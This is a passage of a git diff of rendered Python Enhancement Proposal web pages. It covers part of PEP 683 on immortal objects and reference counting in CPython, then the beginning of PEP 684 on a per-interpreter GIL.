The alternative is to ensure that all shared objects are truly immutable. +There would be no races because there would be no modification. This +is something that the immortality proposed here would enable for +otherwise immutable objects. With immortal objects, +support for a per-interpreter GIL +becomes much simpler.

+
+
+

Avoiding Copy-on-Write

+

For some applications it makes sense to get the application into +a desired initial state and then fork the process for each worker. +This can result in a large performance improvement, especially +memory usage. Several enterprise Python users (e.g. Instagram, +YouTube) have taken advantage of this. However, the above +refcount semantics drastically reduce the benefits and +have led to some sub-optimal workarounds.

+

Also note that “fork” isn’t the only operating system mechanism +that uses copy-on-write semantics. Another example is mmap. +Any such utility will potentially benefit from fewer copy-on-writes +when immortal objects are involved, when compared to using only +“mortal” objects.

+
+
+
+

Rationale

+

The proposed solution is obvious enough that both of this proposal’s +authors came to the same conclusion (and implementation, more or less) +independently. The Pyston project uses a similar approach. +Other designs were also considered. Several possibilities have also +been discussed on python-dev in past years.

+

Alternatives include:

+
    +
  • use a high bit to mark “immortal” but do not change Py_INCREF()
  • +
  • add an explicit flag to objects
  • +
  • implement via the type (tp_dealloc() is a no-op)
  • +
  • track via the object’s type object
  • +
  • track with a separate table
  • +
+

Each of the above makes objects immortal, but none of them address +the performance penalties from refcount modification described above.

+

In the case of per-interpreter GIL, the only realistic alternative +is to move all global objects into PyInterpreterState and add +one or more lookup functions to access them. Then we’d have to +add some hacks to the C-API to preserve compatibility for the +may objects exposed there. The story is much, much simpler +with immortal objects.

+
+
+

Impact

+
+

Benefits

+

Most notably, the cases described in the above examples stand +to benefit greatly from immortal objects. Projects using pre-fork +can drop their workarounds. For the per-interpreter GIL project, +immortal objects greatly simplifies the solution for existing static +types, as well as objects exposed by the public C-API.

+

In general, a strong immutability guarantee for objects enables Python +applications to scale better, particularly in +multi-process deployments. This is because they can then +leverage multi-core parallelism without such a significant tradeoff in +memory usage as they now have. The cases we just described, as well as +those described above in Motivation, reflect this improvement.

+
+
+

Performance

+

A naive implementation shows a 2% slowdown (3% with MSVC). +We have demonstrated a return to ~performance-neutral~ with a handful +of basic mitigations applied. See the mitigations section below.

+

On the positive side, immortal objects save a significant amount of +memory when used with a pre-fork model. Also, immortal +objects provide opportunities for specialization in the eval loop that +would improve performance.

+
+
+

Backward Compatibility

+

Ideally this internal-only feature would be completely compatible. +However, it does involve a change to refcount semantics in some cases. +Only immortal objects are affected, but this includes high-use objects +like None, True, and False.

+

Specifically, when an immortal object is involved:

+
    +
  • code that inspects the refcount will see a really, really large value
  • +
  • the new noop behavior may break code that:
      +
    • depends specifically on the refcount to always increment or decrement +(or have a specific value from Py_SET_REFCNT())
    • +
    • relies on any specific refcount value, other than 0 or 1
    • +
    • directly manipulates the refcount to store extra information there
    • +
    +
  • +
  • in 32-bit pre-3.12 Stable ABI extensions, +objects may leak due to Accidental Immortality
  • +
  • such extensions may crash due to Accidental De-Immortalizing
  • +
+

Again, those changes in behavior only apply to immortal objects, +not the vast majority of objects a user will use. Furthermore, +users cannot mark an object as immortal so no user-created objects +will ever have that changed behavior. Users that rely on any of +the changing behavior for global (builtin) objects are already +in trouble. So the overall impact should be small.

+

Also note that code which checks for refleaks should keep working fine, +unless it checks for hard-coded small values relative to some immortal +object. The problems noticed by Pyston shouldn’t apply here since +we do not modify the refcount.

+

See Public Refcount Details below for further discussion.

+
+

Accidental Immortality

+

Hypothetically, a non-immortal object could be incref’ed so much +that it reaches the magic value needed to be considered immortal. +That means it would never be decref’ed all the way back to 0, so it +would accidentally leak (never be cleaned up).

+

With 64-bit refcounts, this accidental scenario is so unlikely that +we need not worry. Even if done deliberately by using Py_INCREF() +in a tight loop and each iteration only took 1 CPU cycle, it would take +2^60 cycles (if the immortal bit were 2^60). At a fast 5 GHz that would +still take nearly 250,000,000 seconds (over 2,500 days)!

+

Also note that it is doubly unlikely to be a problem because it wouldn’t +matter until the refcount would have gotten back to 0 and the object +cleaned up. So any object that hit that magic “immortal” refcount value +would have to be decref’ed that many times again before the change +in behavior would be noticed.

+

Again, the only realistic way that the magic refcount would be reached +(and then reversed) is if it were done deliberately. (Of course, the +same thing could be done efficiently using Py_SET_REFCNT() though +that would be even less of an accident.) At that point we don’t +consider it a concern of this proposal.

+

On builds with much smaller maximum refcounts, like 32-bit platforms, +the consequences aren’t so obvious. Let’s say the magic refcount +were 2^30. Using the same specs as above, it would take roughly +4 seconds to accidentally immortalize an object. Under reasonable +conditions, it is still highly unlikely that an object be accidentally +immortalized. It would have to meet these criteria:

+
    +
  • targeting a non-immortal object (so not one of the high-use builtins)
  • +
  • the extension increfs without a corresponding decref +(e.g. returns from a function or method)
  • +
  • no other code decrefs the object in the meantime
  • +
+

Even at a much less frequent rate it would not take long to reach +accidental immortality (on 32-bit). However, then it would have to run +through the same number of (now noop-ing) decrefs before that one object +would be effectively leaking. This is highly unlikely, especially because +the calculations assume no decrefs.

+

Furthermore, this isn’t all that different from how such 32-bit extensions +can already incref an object past 2^31 and turn the refcount negative. +If that were an actual problem then we would have heard about it.

+

Between all of the above cases, the proposal doesn’t consider +accidental immortality a problem.

+
+
+

Stable ABI

+

The implementation approach described in this PEP is compatible +with extensions compiled to the stable ABI (with the exception +of Accidental Immortality and Accidental De-Immortalizing). +Due to the nature of the stable ABI, unfortunately, such extensions +use versions of Py_INCREF(), etc. that directly modify the object’s +ob_refcnt field. This will invalidate all the performance benefits +of immortal objects.

+

However, we do ensure that immortal objects (mostly) stay immortal +in that situation. We set the initial refcount of immortal objects to +a value for which we can identify the object as immortal and which +continues to do so even if the refcount is modified by an extension. +(For example, suppose we used one of the high refcount bits to indicate +that an object was immortal. We would set the initial refcount to a +higher value that still matches the bit, like halfway to the next bit. +See _Py_IMMORTAL_REFCNT.) +At worst, objects in that situation would feel the effects +described in the Motivation section. Even then +the overall impact is unlikely to be significant.

+
+
+

Accidental De-Immortalizing

+

32-bit builds of older stable ABI extensions can take +Accidental Immortality to the next level.

+

Hypothetically, such an extension could incref an object to a value on +the next highest bit above the magic refcount value. For example, if +the magic value were 2^30 and the initial immortal refcount were thus +2^30 + 2^29 then it would take 2^29 increfs by the extension to reach +a value of 2^31, making the object non-immortal. +(Of course, a refcount that high would probably already cause a crash, +regardless of immortal objects.)

+

The more problematic case is where such a 32-bit stable ABI extension +goes crazy decref’ing an already immortal object. Continuing with the +above example, it would take 2^29 asymmetric decrefs to drop below the +magic immortal refcount value. So an object like None could be +made mortal and subject to decref. That still wouldn’t be a problem +until somehow the decrefs continue on that object until it reaches 0. +For statically allocated immortal objects, like None, the extension +would crash the process if it tried to dealloc the object. For any +other immortal objects, the dealloc might be okay. However, there +might be runtime code expecting the formerly-immortal object to be +around forever. That code would probably crash.

+

Again, the likelihood of this happening is extremely small, even on +32-bit builds. It would require roughly a billion decrefs on that +one object without a corresponding incref. The most likely scenario is +the following:

+

A “new” reference to None is returned by many functions and methods. +Unlike with non-immortal objects, the 3.12 runtime will basically never +incref None before giving it to the extension. However, the +extension will decref it when done with it (unless it returns it). +Each time that exchange happens with the one object, we get one step +closer to a crash.

+

How realistic is it that some form of that exchange (with a single +object) will happen a billion times in the lifetime of a Python process +on 32-bit? If it is a problem, how could it be addressed?

+

As to how realistic, the answer isn’t clear currently. However, the +mitigation is simple enough that we can safely proceed under the +assumption that it would not be a problem.

+

We look at possible solutions +later on.

+
+
+
+

Alternate Python Implementations

+

This proposal is CPython-specific. However, it does relate to the +behavior of the C-API, which may affect other Python implementations. +Consequently, the effect of changed behavior described in +Backward Compatibility above also applies here (e.g. if another +implementation is tightly coupled to specific refcount values, other +than 0, or on exactly how refcounts change, then they may impacted).

+
+
+

Security Implications

+

This feature has no known impact on security.

+
+
+

Maintainability

+

This is not a complex feature so it should not cause much mental +overhead for maintainers. The basic implementation doesn’t touch +much code so it should have much impact on maintainability. There +may be some extra complexity due to performance penalty mitigation. +However, that should be limited to where we immortalize all objects +post-init and later explicitly deallocate them during runtime +finalization. The code for this should be relatively concentrated.

+
+
+
+

Specification

+

The approach involves these fundamental changes:

+
    +
  • add _Py_IMMORTAL_REFCNT (the magic value) to the internal C-API
  • +
  • update Py_INCREF() and Py_DECREF() to no-op for objects +that match the magic refcount
  • +
  • do the same for any other API that modifies the refcount
  • +
  • stop modifying PyGC_Head for immortal GC objects (“containers”)
  • +
  • ensure that all immortal objects are cleaned up during +runtime finalization
  • +
+

Then setting any object’s refcount to _Py_IMMORTAL_REFCNT +makes it immortal.

+

(There are other minor, internal changes which are not described here.)

+

In the following sub-sections we dive into the most significant details. +First we will cover some conceptual topics, followed by more concrete +aspects like specific affected APIs.

+
+

Public Refcount Details

+

In Backward Compatibility we introduced possible ways that user code +might be broken by the change in this proposal. Any contributing +misunderstanding by users is likely due in large part to the names of +the refcount-related API and to how the documentation explains those +API (and refcounting in general).

+

Between the names and the docs, we can clearly see answers +to the following questions:

+
    +
  • what behavior do users expect?
  • +
  • what guarantees do we make?
  • +
  • do we indicate how to interpret the refcount value they receive?
  • +
  • what are the use cases under which a user would set an object’s +refcount to a specific value?
  • +
  • are users setting the refcount of objects they did not create?
  • +
+

As part of this proposal, we must make sure that users can clearly +understand on which parts of the refcount behavior they can rely and +which are considered implementation details. Specifically, they should +use the existing public refcount-related API and the only refcount +values with any meaning are 0 and 1. (Some code relies on 1 as an +indicator that the object can be safely modified.) All other values +are considered “not 0 or 1”.

+

This information will be clarified +in the documentation.

+

Arguably, the existing refcount-related API should be modified to reflect +what we want users to expect. Something like the following:

+
    +
  • Py_INCREF() -> Py_ACQUIRE_REF() (or only support Py_NewRef())
  • +
  • Py_DECREF() -> Py_RELEASE_REF()
  • +
  • Py_REFCNT() -> Py_HAS_REFS()
  • +
  • Py_SET_REFCNT() -> Py_RESET_REFS() and Py_SET_NO_REFS()
  • +
+

However, such a change is not a part of this proposal. It is included +here to demonstrate the tighter focus for user expectations that would +benefit this change.

+
+
+

Constraints

+
    +
  • ensure that otherwise immutable objects can be truly immutable
  • +
  • minimize performance penalty for normal Python use cases
  • +
  • be careful when immortalizing objects that we don’t actually expect +to persist until runtime finalization.
  • +
  • be careful when immortalizing objects that are not otherwise immutable
  • +
  • __del__ and weakrefs must continue working properly
  • +
+

Regarding “truly” immutable objects, this PEP doesn’t impact the +effective immutability of any objects, other than the per-object +runtime state (e.g. refcount). So whether or not some immortal object +is truly (or even effectively) immutable can only be settled separately +from this proposal. For example, str objects are generally considered +immutable, but PyUnicodeObject holds some lazily cached data. This +PEP has no influence on how that state affects str immutability.

+
+
+

Immortal Mutable Objects

+

Any object can be marked as immortal. We do not propose any +restrictions or checks. However, in practice the value of making an +object immortal relates to its mutability and depends on the likelihood +it would be used for a sufficient portion of the application’s lifetime. +Marking a mutable object as immortal can make sense in some situations.

+

Many of the use cases for immortal objects center on immutability, so +that threads can safely and efficiently share such objects without +locking. For this reason a mutable object, like a dict or list, would +never be shared (and thus no immortality). However, immortality may +be appropriate if there is sufficient guarantee that the normally +mutable object won’t actually be modified.

+

On the other hand, some mutable objects will never be shared between +threads (at least not without a lock like the GIL). In some cases it +may be practical to make some of those immortal too. For example, +sys.modules is a per-interpreter dict that we do not expect to +ever get freed until the corresponding interpreter is finalized +(assuming it isn’t replaced). By making it immortal, we would +no longer incur the extra overhead during incref/decref.

+

We explore this idea further in the mitigations section below.

+
+
+

Implicitly Immortal Objects

+

If an immortal object holds a reference to a normal (mortal) object +then that held object is effectively immortal. This is because that +object’s refcount can never reach 0 until the immortal object releases +it.

+

Examples:

+
    +
  • containers like dict and list
  • +
  • objects that hold references internally like PyTypeObject with +its tp_subclasses and tp_weaklist
  • +
  • an object’s type (held in ob_type)
  • +
+

Such held objects are thus implicitly immortal for as long as they are +held. In practice, this should have no real consequences since it +really isn’t a change in behavior. The only difference is that the +immortal object (holding the reference) doesn’t ever get cleaned up.

+

We do not propose that such implicitly immortal objects be changed +in any way. They should not be explicitly marked as immortal just +because they are held by an immortal object. That would provide +no advantage over doing nothing.

+
+
+

Un-Immortalizing Objects

+

This proposal does not include any mechanism for taking an immortal +object and returning it to a “normal” condition. Currently there +is no need for such an ability.

+

On top of that, the obvious approach is to simply set the refcount +to a small value. However, at that point there is no way in knowing +which value would be safe. Ideally we’d set it to the value that it +would have been if it hadn’t been made immortal. However, that value +will have long been lost. Hence the complexities involved make it less +likely that an object could safely be un-immortalized, even if we +had a good reason to do so.

+
+
+

_Py_IMMORTAL_REFCNT

+

We will add two internal constants:

+
_Py_IMMORTAL_BIT - has the top-most available bit set (e.g. 2^62)
+_Py_IMMORTAL_REFCNT - has the two top-most available bits set
+
+
+

The actual top-most bit depends on existing uses for refcount bits, +e.g. the sign bit or some GC uses. We will use the highest bit possible +after consideration of existing uses.

+

The refcount for immortal objects will be set to _Py_IMMORTAL_REFCNT +(meaning the value will be halfway between _Py_IMMORTAL_BIT and the +value at the next highest bit). However, to check if an object is +immortal we will compare (bitwise-and) its refcount against just +_Py_IMMORTAL_BIT.

+

The difference means that an immortal object will still be considered +immortal, even if somehow its refcount were modified (e.g. by an older +stable ABI extension).

+

Note that top two bits of the refcount are already reserved for other +uses. That’s why we are using the third top-most bit.

+

The implementation is also open to using other values for the immortal +bit, such as the sign bit or 2^31 (for saturated refcounts on 64-bit).

+
+
+

Affected API

+

API that will now ignore immortal objects:

+
    +
  • (public) Py_INCREF()
  • +
  • (public) Py_DECREF()
  • +
  • (public) Py_SET_REFCNT()
  • +
  • (private) _Py_NewReference()
  • +
+

API that exposes refcounts (unchanged but may now return large values):

+
    +
  • (public) Py_REFCNT()
  • +
  • (public) sys.getrefcount()
  • +
+

(Note that _Py_RefTotal, and consequently sys.gettotalrefcount(), +will not be affected.)

+

TODO: clarify the status of _Py_RefTotal.

+

Also, immortal objects will not participate in GC.

+
+
+

Immortal Global Objects

+

All runtime-global (builtin) objects will be made immortal. +That includes the following:

+
    +
  • singletons (None, True, False, Ellipsis, NotImplemented)
  • +
  • all static types (e.g. PyLong_Type, PyExc_Exception)
  • +
  • all static objects in _PyRuntimeState.global_objects (e.g. identifiers, +small ints)
  • +
+

The question of making the full objects actually immutable (e.g. +for per-interpreter GIL) is not in the scope of this PEP.

+
+
+

Object Cleanup

+

In order to clean up all immortal objects during runtime finalization, +we must keep track of them.

+

For GC objects (“containers”) we’ll leverage the GC’s permanent +generation by pushing all immortalized containers there. During +runtime shutdown, the strategy will be to first let the runtime try +to do its best effort of deallocating these instances normally. Most +of the module deallocation will now be handled by +pylifecycle.c:finalize_modules() where we clean up the remaining +modules as best as we can. It will change which modules are available +during __del__, but that’s already explicitly undefined behavior +in the docs. Optionally, we could do some topological ordering +to guarantee that user modules will be deallocated first before +the stdlib modules. Finally, anything left over (if any) can be found +through the permanent generation GC list which we can clear +after finalize_modules() is done.

+

For non-container objects, the tracking approach will vary on a +case-by-case basis. In nearly every case, each such object is directly +accessible on the runtime state, e.g. in a _PyRuntimeState or +PyInterpreterState field. We may need to add a tracking mechanism +to the runtime state for a small number of objects.

+

None of the cleanup will have a significant effect on performance.

+
+
+

Performance Regression Mitigations

+

In the interest of clarity, here are some of the ways we are going +to try to recover some of the 4% performance +we lose with the naive implementation of immortal objects.

+

Note that none of this section is actually part of the proposal.

+
+

at the end of runtime init, mark all objects as immortal

+

We can apply the concept from +Immortal Mutable Objects in the pursuit of getting back some of +that 4% performance we lose with the naive implementation of immortal +objects. At the end of runtime init we can mark all objects as +immortal and avoid the extra cost in incref/decref. We only need +to worry about immutability with objects that we plan on sharing +between threads without a GIL.

+
+
+

drop unnecessary hard-coded refcount operations

+

Parts of the C-API interact specifically with objects that we know +to be immortal, like Py_RETURN_NONE. Such functions and macros +can be updated to drop any refcount operations.

+
+
+

specialize for immortal objects in the eval loop

+

There are opportunities to optimize operations in the eval loop +involving specific known immortal objects (e.g. None). The +general mechanism is described in PEP 659. Also see Pyston.

+
+
+

other possibilities

+
    +
  • mark every interned string as immortal
  • +
  • mark the “interned” dict as immortal if shared else share all interned strings
  • +
  • (Larry,MAL) mark all constants unmarshalled for a module as immortal
  • +
  • (Larry,MAL) allocate (immutable) immortal objects in their own memory page(s)
  • +
  • saturated refcounts using the 32 least-significant bits
  • +
+
+
+
+

Solutions for Accidental De-Immortalization

+

In the Accidental De-Immortalizing section we outlined a possible +negative consequence of immortal objects. Here we look at some +of the options to deal with that.

+

Note that we enumerate solutions here to illustrate that satisfactory +options are available, rather than to dictate how the problem will +be solved.

+

Also note the following:

+
    +
  • this only matters in the 32-bit stable-ABI case
  • +
  • it only affects immortal objects
  • +
  • there are no user-defined immortal objects, only built-in types
  • +
  • most immortal objects will be statically allocated +(and thus already must fail if tp_dealloc() is called)
  • +
  • only a handful of immortal objects will be used often enough +to possibly face this problem in practice (e.g. None)
  • +
  • the main problem to solve is crashes coming from tp_dealloc()
  • +
+

One fundamental observation for a solution is that we can reset +an immortal object’s refcount to _Py_IMMORTAL_REFCNT +when some condition is met.

+

With all that in mind, a simple, yet effective, solution would be +to reset an immortal object’s refcount in tp_dealloc(). +NoneType and bool already have a tp_dealloc() that calls +Py_FatalError() if triggered. The same goes for other types based +on certain conditions, like PyUnicodeObject (depending on +unicode_is_singleton()), PyTupleObject, and PyTypeObject. +In fact, the same check is important for all statically declared object. +For those types, we would instead reset the refcount. For the +remaining cases we would introduce the check. In all cases, +the overhead of the check in tp_dealloc() should be too small +to matter.

+

Other (less practical) solutions:

+
    +
  • periodically reset the refcount for immortal objects
  • +
  • only do that for high-use objects
  • +
  • only do it if a stable-ABI extension has been imported
  • +
  • provide a runtime flag for disabling immortality
  • +
+

(The discussion thread +has further detail.)

+

Regardless of the solution we end up with, we can do something else +later if necessary.

+

TODO: Add a note indicating that the implemented solution does not +affect the overall ~performance-neutral~ outcome.

+
+
+

Documentation

+

The immortal objects behavior and API are internal, implementation +details and will not be added to the documentation.

+

However, we will update the documentation to make public guarantees +about refcount behavior more clear. That includes, specifically:

+
    +
  • Py_INCREF() - change “Increment the reference count for object o.” +to “Indicate taking a new reference to object o.”
  • +
  • Py_DECREF() - change “Decrement the reference count for object o.” +to “Indicate no longer using a previously taken reference to object o.”
  • +
  • similar for Py_XINCREF(), Py_XDECREF(), Py_NewRef(), +Py_XNewRef(), Py_Clear()
  • +
  • Py_REFCNT() - add “The refcounts 0 and 1 have specific meanings +and all others only mean code somewhere is using the object, +regardless of the value. +0 means the object is not used and will be cleaned up. +1 means code holds exactly a single reference.”
  • +
  • Py_SET_REFCNT() - refer to Py_REFCNT() about how values over 1 +may be substituted with some over value
  • +
+

We may also add a note about immortal objects to the following, +to help reduce any surprise users may have with the change:

+
    +
  • Py_SET_REFCNT() (a no-op for immortal objects)
  • +
  • Py_REFCNT() (value may be surprisingly large)
  • +
  • sys.getrefcount() (value may be surprisingly large)
  • +
+

Other API that might benefit from such notes are currently undocumented. +We wouldn’t add such a note anywhere else (including for Py_INCREF() +and Py_DECREF()) since the feature is otherwise transparent to users.

+
+
+
+

Reference Implementation

+

The implementation is proposed on GitHub:

+

https://github.com/python/cpython/pull/19474

+
+
+

Open Issues

+ +
+
+

References

+
+

Prior Art

+ +
+
+

Discussions

+

This was discussed in December 2021 on python-dev:

+ +
+
+

Runtime Object State

+

Here is the internal state that the CPython runtime keeps +for each Python object:

+ +

ob_refcnt is part of the memory allocated for every object. +However, _PyObject_HEAD_EXTRA is allocated only if CPython was built +with Py_TRACE_REFS defined. PyGC_Head is allocated only if the +object’s type has Py_TPFLAGS_HAVE_GC set. Typically this is only +container types (e.g. list). Also note that PyObject.ob_refcnt +and _PyObject_HEAD_EXTRA are part of PyObject_HEAD.

+
+
+

Reference Counting, with Cyclic Garbage Collection

+

Garbage collection is a memory management feature of some programming +languages. It means objects are cleaned up (e.g. memory freed) +once they are no longer used.

+

Refcounting is one approach to garbage collection. The language runtime +tracks how many references are held to an object. When code takes +ownership of a reference to an object or releases it, the runtime +is notified and it increments or decrements the refcount accordingly. +When the refcount reaches 0, the runtime cleans up the object.

+

With CPython, code must explicitly take or release references using +the C-API’s Py_INCREF() and Py_DECREF(). These macros happen +to directly modify the object’s refcount (unfortunately, since that +causes ABI compatibility issues if we want to change our garbage +collection scheme). Also, when an object is cleaned up in CPython, +it also releases any references (and resources) it owns +(before it’s memory is freed).

+

Sometimes objects may be involved in reference cycles, e.g. where +object A holds a reference to object B and object B holds a reference +to object A. Consequently, neither object would ever be cleaned up +even if no other references were held (i.e. a memory leak). The +most common objects involved in cycles are containers.

+

CPython has dedicated machinery to deal with reference cycles, which +we call the “cyclic garbage collector”, or often just +“garbage collector” or “GC”. Don’t let the name confuse you. +It only deals with breaking reference cycles.

+

See the docs for a more detailed explanation of refcounting +and cyclic garbage collection:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0683.rst

+

Last modified: 2024-06-12 18:00:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0684/index.html b/pep-0684/index.html new file mode 100644 index 00000000000..0f626817afd --- /dev/null +++ b/pep-0684/index.html @@ -0,0 +1,1022 @@ + + + + + + + + PEP 684 – A Per-Interpreter GIL | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 684 – A Per-Interpreter GIL

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
683
+
Created:
+
08-Mar-2022
+
Python-Version:
+
3.12
+
Post-History:
+
08-Mar-2022, +29-Sep-2022, +28-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Since Python 1.5 (1997), CPython users can run multiple interpreters +in the same process. However, interpreters in the same process +have always shared a significant +amount of global state. This is a source of bugs, with a growing +impact as more and more people use the feature. Furthermore, +sufficient isolation would facilitate true multi-core parallelism, +where interpreters no longer share the GIL. The changes outlined in +this proposal will result in that level of interpreter isolation.

+
+
+

High-Level Summary

+

At a high level, this proposal changes CPython in the following ways:

+
    +
  • stops sharing the GIL between interpreters, given sufficient isolation
  • +
  • adds several new interpreter config options for isolation settings
  • +
  • keeps incompatible extensions from causing problems
  • +
+
+

The GIL

+

The GIL protects concurrent access to most of CPython’s runtime state. +So all that GIL-protected global state must move to each interpreter +before the GIL can.

+

(In a handful of cases, other mechanisms can be used to ensure +thread-safe sharing instead, such as locks or “immortal” objects.)

+
+
+

CPython Runtime State

+

Properly isolating interpreters requires that most of CPython’s +runtime state be stored in the PyInterpreterState struct. Currently, +only a portion of it is; the rest is found either in C global variables +or in _PyRuntimeState. Most of that will have to be moved.

+

This directly coincides with an ongoing effort (of many years) to greatly +reduce internal use of global variables and consolidate the runtime +state into _PyRuntimeState and PyInterpreterState. +(See Consolidating Runtime Global State below.) That project has +significant merit on its own +and has faced little controversy. So, while a per-interpreter GIL +relies on the completion of that effort, that project should not be +considered a part of this proposal–only a dependency.

+
+
+

Other Isolation Considerations

+

CPython’s interpreters must be strictly isolated from each other, with +few exceptions. To a large extent they already are. Each interpreter +has its own copy of all modules, classes, functions, and variables. +The CPython C-API docs explain further.

+

However, aside from what has already been mentioned (e.g. the GIL), +there are a couple of ways in which interpreters still share some state.

+

First of all, some process-global resources (e.g. memory, +file descriptors, environment variables) are shared. There are no +plans to change this.

+

Second, some isolation is faulty due to bugs or implementations that +did not take multiple interpreters into account. This includes +CPython’s runtime and the stdlib, as well as extension modules that +rely on global variables. Bugs should be opened in these cases, +as some already have been.

+
+
+

Depending on Immortal Objects

+

PEP 683 introduces immortal objects as a CPython-internal feature. +With immortal objects, we can share any otherwise immutable global +objects between all interpreters. Consequently, this PEP does not +need to address how to deal with the various objects +exposed in the public C-API. +It also simplifies the question of what to do about the builtin +static types. (See Global Objects below.)

+

Both issues have alternate solutions, but everything is simpler with +immortal objects. If PEP 683 is not accepted then this one will be +updated with the alternatives. This lets us reduce noise in this +proposal.

+
+
+
+

Motivation

+

The fundamental problem we’re solving here is a lack of true multi-core +parallelism (for Python code) in the CPython runtime. The GIL is the +cause. While it usually isn’t a problem in practice, at the very least +it makes Python’s multi-core story murky, which makes the GIL +a consistent distraction.

+

Isolated interpreters are also an effective mechanism to support +certain concurrency models. PEP 554 discusses this in more detail.

+
+

Indirect Benefits

+

Most of the effort needed for a per-interpreter GIL has benefits that +make those tasks worth doing anyway:

+
    +
  • makes multiple-interpreter behavior more reliable
  • +
  • has led to fixes for long-standing runtime bugs that otherwise +hadn’t been prioritized
  • +
  • has been exposing (and inspiring fixes for) previously unknown runtime bugs
  • +
  • has driven cleaner runtime initialization (PEP 432, PEP 587)
  • +
  • has driven cleaner and more complete runtime finalization
  • +
  • led to structural layering of the C-API (e.g. Include/internal)
  • +
  • also see Benefits to Consolidation below
  • +
+

Furthermore, much of that work benefits other CPython-related projects:

+ +
+
+

Existing Use of Multiple Interpreters

+

The C-API for multiple interpreters has been used for many years. +However, until relatively recently the feature wasn’t widely known, +nor extensively used (with the exception of mod_wsgi).

+

In the last few years use of multiple interpreters has been increasing. +Here are some of the public projects using the feature currently:

+ +

Note that, with PEP 554, multiple interpreter usage would likely +grow significantly (via Python code rather than the C-API).

+
+
+

PEP 554 (Multiple Interpreters in the Stdlib)

+

PEP 554 is strictly about providing a minimal stdlib module +to give users access to multiple interpreters from Python code. +In fact, it specifically avoids proposing any changes related to +the GIL. Consider, however, that users of that module would benefit +from a per-interpreter GIL, which makes PEP 554 more appealing.

+
+
+
+

Rationale

+

During initial investigations in 2014, a variety of possible solutions +for multi-core Python were explored, but each had its drawbacks +without simple solutions:

+
    +
  • the existing practice of releasing the GIL in extension modules
      +
    • doesn’t help with Python code
    • +
    +
  • +
  • other Python implementations (e.g. Jython, IronPython)
      +
    • CPython dominates the community
    • +
    +
  • +
  • remove the GIL (e.g. gilectomy, “no-gil”)
      +
    • too much technical risk (at the time)
    • +
    +
  • +
  • Trent Nelson’s “PyParallel” project
      +
    • incomplete; Windows-only at the time
    • +
    +
  • +
  • multiprocessing
      +
    • too much work to make it effective enough; +high penalties in some situations (at large scale, Windows)
    • +
    +
  • +
  • other parallelism tools (e.g. dask, ray, MPI)
      +
    • not a fit for the runtime/stdlib
    • +
    +
  • +
  • give up on multi-core (e.g. async, do nothing)
      +
    • this can only end in tears
    • +
    +
  • +
+

Even in 2014, it was fairly clear that a solution using isolated +interpreters did not have a high level of technical risk and that +most of the work was worth doing anyway. +(The downside was the volume of work to be done.)

+
+
+

Specification

+

As summarized above, this proposal involves the +following changes, in the order they must happen:

+
    +
  1. consolidate global runtime state +(including objects) into _PyRuntimeState
  2. +
  3. move nearly all of the state down into PyInterpreterState
  4. +
  5. finally, move the GIL down into PyInterpreterState
  6. +
  7. everything else
      +
    • update the C-API
    • +
    • implement extension module restrictions
    • +
    • work with popular extension maintainers to help +with multi-interpreter support
    • +
    +
  8. +
+
+

Per-Interpreter State

+

The following runtime state will be moved to PyInterpreterState:

+
    +
  • all global objects that are not safely shareable (fully immutable)
  • +
  • the GIL
  • +
  • most mutable data that’s currently protected by the GIL
  • +
  • mutable data that’s currently protected by some other per-interpreter lock
  • +
  • mutable data that may be used independently in different interpreters +(also applies to extension modules, including those with multi-phase init)
  • +
  • all other mutable data not otherwise excluded below
  • +
+

Furthermore, a portion of the full global state has already been +moved to the interpreter, including GC, warnings, and atexit hooks.

+

The following runtime state will not be moved:

+
    +
  • global objects that are safely shareable, if any
  • +
  • immutable data, often const
  • +
  • effectively immutable data (treated as immutable), for example:
      +
    • some state is initialized early and never modified again
    • +
    • hashes for strings (PyUnicodeObject) are idempotently calculated +when first needed and then cached
    • +
    +
  • +
  • all data that is guaranteed to be modified exclusively in the main thread, +including:
      +
    • state used only in CPython’s main()
    • +
    • the REPL’s state
    • +
    • data modified only during runtime init (effectively immutable afterward)
    • +
    +
  • +
  • mutable data that’s protected by some global lock (other than the GIL)
  • +
  • global state in atomic variables
  • +
  • mutable global state that can be changed (sensibly) to atomic variables
  • +
+
+

Memory Allocators

+

This is one of the most sensitive parts of the work to isolate interpreters. +The simplest solution is to move the global state of the internal +“small block” allocator to PyInterpreterState, as we are doing with +nearly all other runtime state. The following elaborates on the details +and rationale.

+

CPython provides a memory management C-API, with three allocator domains: +“raw”, “mem”, and “object”. Each provides the equivalent of malloc(), +calloc(), realloc(), and free(). A custom allocator for each +domain can be set during runtime initialization and the current allocator +can be wrapped with a hook using the same API (for example, the stdlib +tracemalloc module). The allocators are currently runtime-global, +shared by all interpreters.

+

The “raw” allocator is expected to be thread-safe and defaults to glibc’s +allocator (malloc(), etc.). However, the “mem” and “object” allocators +are not expected to be thread-safe and currently may rely on the GIL for +thread-safety. This is partly because the default allocator for both, +AKA “pyobject”, is not thread-safe. This is due to how all state for +that allocator is stored in C global variables. +(See Objects/obmalloc.c.)

+

Thus we come back to the question of isolating runtime state. In order +for interpreters to stop sharing the GIL, allocator thread-safety +must be addressed. If interpreters continue sharing the allocators +then we need some other way to get thread-safety. Otherwise interpreters +must stop sharing the allocators. In both cases there are a number of +possible solutions, each with potential downsides.

+

To keep sharing the allocators, the simplest solution is to use +a granular runtime-global lock around the calls to the “mem” and “object” +allocators in PyMem_Malloc(), PyObject_Malloc(), etc. This would +impact performance, but there are some ways to mitigate that (e.g. only +start locking once the first subinterpreter is created).

+

Another way to keep sharing the allocators is to require that the “mem” +and “object” allocators be thread-safe. This would mean we’d have to +make the pyobject allocator implementation thread-safe. That could +even involve re-implementing it using an extensible allocator like +mimalloc. The potential downside is in the cost to re-implement +the allocator and the risk of defects inherent to such an endeavor.

+

Regardless, a switch to requiring thread-safe allocators would impact +anyone that embeds CPython and currently sets a thread-unsafe allocator. +We’d need to consider who might be affected and how we reduce any +negative impact (e.g. add a basic C-API to help make an allocator +thread-safe).

+

